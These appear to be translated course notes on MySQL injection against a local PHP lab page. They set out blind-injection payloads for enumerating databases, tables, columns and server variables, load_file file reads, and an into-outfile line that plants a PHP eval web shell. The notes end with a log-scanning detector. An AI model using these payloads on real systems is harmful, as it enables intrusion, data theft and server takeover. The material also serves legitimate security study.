• Web security: PHP + MySQL 5 injection defense (part 2)



    Day 4:

    1. New injection functions:

    • ascii()
    • substring("string", n, m)    n >= 1
    • limit n,m                    n >= 0
    • length()
    • union             merges the result sets of two or more SELECT statements, without duplicate rows
    • union all         same as above, but duplicate rows are allowed
    • select distinct   same as select, but with duplicates removed
    • load_file()       file read
    • into outfile      file write

    information_schema.schemata          holds information about all databases

    • SCHEMA_NAME                        database name
    • DEFAULT_CHARACTER_SET_NAME         database character set
    • GLOBAL_VARIABLES                   all global variables

    2. Guessing the number of databases, database names, table names and column names:

    // guess the length of the current database name, then the name itself
    http://127.0.0.1/first.php?x=1 and Length((database()))=5 // length of the current database name (database name: sqlin)
    http://127.0.0.1/first.php?x=1 and ascii(substring((database()),1,1))=115 // guess the first character of the current database name, ascii('s') = 115
    http://127.0.0.1/first.php?x=1 and ascii(substring((database()),2,1))=113

    // determine the number of databases
    http://127.0.0.1/first.php?x=1 and (select count(schema_name) from information_schema.schemata)=6

    // determine the length of every database name
    http://127.0.0.1/first.php?x=1 and length((select distinct schema_name from information_schema.schemata limit 0,1))=18 // equivalent to the next line
    http://127.0.0.1/first.php?x=1 and Length((select distinct schema_name from `information_schema`.schemata limit 0,1))=18 // first database
    http://127.0.0.1/first.php?x=1 and Length((select distinct schema_name from `information_schema`.schemata limit 1,1))=5
    http://127.0.0.1/first.php?x=1 and Length((select distinct schema_name from `information_schema`.schemata limit 2,1))=17
    http://127.0.0.1/first.php?x=1 and Length((select distinct schema_name from `information_schema`.schemata limit 3,1))=5
    http://127.0.0.1/first.php?x=1 and Length((select distinct schema_name from `information_schema`.schemata limit 4,1))=9
    http://127.0.0.1/first.php?x=1 and Length((select distinct schema_name from `information_schema`.schemata limit 5,1))=4
    http://127.0.0.1/first.php?x=1 and Length((select distinct schema_name from `information_schema`.schemata limit 6,1))>0 // there is no 7th database

    // guess every database name
    http://127.0.0.1/first.php?x=1 and ascii(substring((select distinct schema_name from `information_schema`.schemata limit 0,1),1,1))<79 // ascii value of the first character of the first database name
    http://127.0.0.1/first.php?x=1 and ascii(substring((select distinct schema_name from `information_schema`.schemata limit 1,1),1,1))<79
    http://127.0.0.1/first.php?x=1 and length((SELECT table_name from information_schema.tables where table_schema=0x73716C696E limit 0,1))=4 // length of the first table name in the first database
    http://127.0.0.1/first.php?x=1 and ascii(substring((SELECT column_name from information_schema.columns where table_schema=0x73716C696E and table_name=0x6E657773 limit 0,1),1,1))=105 // 'i'
    http://127.0.0.1/first.php?x=1 and ascii(substring((SELECT column_name from information_schema.columns where table_schema=0x73716C696E and table_name=0x6E657773 limit 0,1),2,1))=100 // 'd'

    Note:
    http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
    http://127.0.0.1/first.php?x=1 and ascii(substring ((0x41),1,1))=0x41 // statement seen in a packet capture; the space after substring makes this injection ineffective, probably a tool bug
    
     
    

    File read:

    • 1. Use either "\\" or "/" in the path; avoid a bare "\", which is treated as an escape
    • 2. load_file("C:/phpStudy/WWW/first.php") can also be written in hexadecimal form: load_file(0xnnnnnnn)
    • http://127.0.0.1/first.php?x=1 union select load_file("C:/phpStudy/WWW/first.php"),2,3

    File write:

    • http://127.0.0.1/first.php?x=1 union select "<?php eval($_GET['caidao']); ?>",2,3 into outfile "C:/phpStudy/WWW/caidao.php"

    Ways to obtain the website path:

    • 1. Error messages: errors disclosed by a vulnerability
    • 2. Leftover files: phpinfo.php, php.php, info.php, test.php
    • 3. Reading configuration files
    • 4. Social engineering: the domain name is the path, Google searches, inurl:edu.cn warning

      

    3. Information in the global_variables table under information_schema that may be useful during injection:

    • version              database version
    • basedir              database installation path
    • datadir              database data-file directory
    • hostname             server host name
    • port                 database port
    • pid_file             path of the process pid file
    • general_log_file     log file path
    • character_set_server character set
    http://127.0.0.1/first.php?x=1 UNION SELECT variable_name,2,3 from information_schema.global_variables
    http://127.0.0.1/first.php?x=1 UNION SELECT variable_value,2,3 from information_schema.global_variables where variable_name=0x76657273696F6E // version; can also be obtained directly via VERSION()
    http://127.0.0.1/first.php?x=1 UNION SELECT variable_value,2,3 from information_schema.global_variables where variable_name=0x62617365646972 // basedir: database installation path
    http://127.0.0.1/first.php?x=1 UNION SELECT variable_value,2,3 from information_schema.global_variables where variable_name=0x44415441444952 // datadir: database data-file directory
    http://127.0.0.1/first.php?x=1 UNION SELECT variable_value,2,3 from information_schema.global_variables where variable_name=0x686F73746E616D65 // hostname: server host name
    http://127.0.0.1/first.php?x=1 UNION SELECT variable_value,2,3 from information_schema.global_variables where variable_name=0x504F5254 // PORT: database port
    http://127.0.0.1/first.php?x=1 UNION SELECT variable_value,2,3 from information_schema.global_variables where variable_name=0x5049445F46494C45 // pid_file: path of the process pid file
    http://127.0.0.1/first.php?x=1 UNION SELECT variable_value,2,3 from information_schema.global_variables where variable_name=0x47454E4552414C5F4C4F475F46494C45 // GENERAL_LOG_FILE: log file path
    http://127.0.0.1/first.php?x=1 UNION SELECT variable_value,2,3 from information_schema.global_variables where variable_name=0x4348415241435445525F5345545F534552564552 // CHARACTER_SET_SERVER: character set
    mysql> show variables; // or list all global variables in the interactive client

    Low-privilege users can also access it:
    mysql> show databases;
    +--------------------+
    | Database           |
    +--------------------+
    | information_schema |
    | test               |
    +--------------------+
    2 rows in set (0.00 sec)
    
    mysql> use information_schema;
    Database changed
    mysql> select variable_value from global_variables where variable_name=0x686F73746E616D65;
    +----------------+
    | variable_value |
    +----------------+
    | win7-PC        |
    +----------------+
    1 row in set (0.00 sec)
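    As an added example (not code from the original notes), here is a small Python detector for the web-server side of sections 2 and 3 and the file read/write notes: it scans access-log lines for the probe shapes listed above (ascii()/substring() character guesses, information_schema lookups, load_file() / into outfile, union select) and decodes the 0x... hex literals so an analyst can see which schema, table, variable or path a probe names. The log lines are constructed samples, and the signature and function names are my own.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (not from the original post), shaped like the
# probes in the notes: ascii()/substring() guesses, a hex-encoded schema name, load_file().
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /first.php?x=1%20and%20ascii(substring((database()),1,1))=115 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /first.php?x=1%20and%20ascii(substring((database()),2,1))=113 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /first.php?x=1%20and%20length((select%20table_name%20from%20information_schema.tables%20where%20table_schema=0x73716C696E%20limit%200,1))=4 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /first.php?x=1%20union%20select%20load_file(0x433A2F7068705374756479),2,3 HTTP/1.1" 200 900
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /first.php?x=7 HTTP/1.1" 200 512
"""

# One signature per technique in the notes; \s* tolerates the "substring (" spacing variant.
SIGNATURES = {
    "blind_char_guess": re.compile(r"ascii\s*\(\s*substring\s*\("),
    "schema_enum": re.compile(r"information_schema\s*\.\s*(schemata|tables|columns|global_variables)"),
    "file_read": re.compile(r"load_file\s*\("),
    "file_write": re.compile(r"into\s+outfile"),
    "union_select": re.compile(r"union\s+(all\s+)?select"),
}
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')
HEX_RE = re.compile(r"0x([0-9a-f]+)")


def decode_hex_literals(query: str) -> list:
    """Decode MySQL 0x... literals (0x73716c696e -> 'sqlin') so the analyst can see
    which schema, table, variable or file path a probe names."""
    return [bytes.fromhex(h).decode("latin-1")
            for h in HEX_RE.findall(query.lower()) if len(h) % 2 == 0]


def classify_request(target: str) -> dict:
    """Tag one request URL with the techniques it matches, plus decoded hex literals."""
    query = unquote_plus(urlsplit(target).query).lower()
    tags = [name for name, rx in SIGNATURES.items() if rx.search(query)]
    return {"tags": tags, "hex": decode_hex_literals(query)}


def scan_log(text: str) -> list:
    """Parse combined-format log lines; return {ip, target, tags, hex} for each hit."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ip, _method, target = m.groups()
            result = classify_request(target)
            if result["tags"]:
                findings.append({"ip": ip, "target": target, **result})
    return findings
```

    A blind injection shows up as a long run of flagged requests from one client that differ only in the compared ascii value, so counting hits per source IP over a short window is the useful alert, not any single line.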
    

      

  • Original source: https://www.cnblogs.com/i-honey/p/7905467.html